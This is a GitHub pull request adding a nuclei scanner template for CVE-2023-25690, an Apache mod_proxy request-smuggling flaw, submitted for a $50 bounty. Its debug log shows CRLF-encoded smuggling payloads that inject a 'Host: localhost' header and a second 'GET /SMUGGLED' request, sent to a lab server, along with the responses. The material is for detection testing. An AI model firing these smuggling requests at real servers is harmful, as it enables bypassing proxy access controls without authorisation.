PR
Add CVE-2023-25690
projectdiscovery/nuclei-templates#12458

Template / PR Information

Template Validation

I’ve validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Lab: https://github.com/oOCyginXOo/CVE-2023-25690-POC/tree/main/lab

Debug:

nuclei -u http://172.17.151.164/categories/1 -t .\http\cves\2023\CVE-2023-25690.yaml -debug

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1

GET /categories/1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1+HTTP/1.1%0A%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

GET /categories/1%20HTTP/1.1%0A%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1+HTTP/1.1%0A%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

HTTP/1.1 400 Bad Request
Connection: close
Content-Length: 304
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 172.20.0.2 Port 8080</address>
</body></html>
[INF] [CVE-2023-25690] Dumped HTTP request for http://172.17.151.164/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

GET /categories/1%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1 HTTP/1.1
Host: 172.17.151.164
User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2023-25690] Dumped HTTP response http://172.17.151.164/categories/1+HTTP/1.1%0D%0AHost:+localhost%0D%0A%0D%0AGET+/SMUGGLED+HTTP/1.1

HTTP/1.1 200 OK
Connection: close
Content-Length: 21
Content-Type: text/html; charset=UTF-8
Date: Mon, 23 Jun 2025 12:31:38 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

You category ID is: 1
[CVE-2023-25690:dsl-1] [http] [critical] http://172.17.151.164/categories/1%20HTTP/1.1%0D%0AHost:%20localhost%0D%0A%0D%0AGET%20/SMUGGLED%20HTTP/1.1
[INF] Scan completed in 14.3284ms. 1 matches found.

/claim #12455

Additional References:

Claim

Total prize pool $50
Total paid $0
Status Pending
Submitted June 23, 2025
Last updated June 23, 2025

Contributors

pszyszkowski

@pszyszkowski

100%

Sponsors

ProjectDiscovery

@projectdiscovery

$50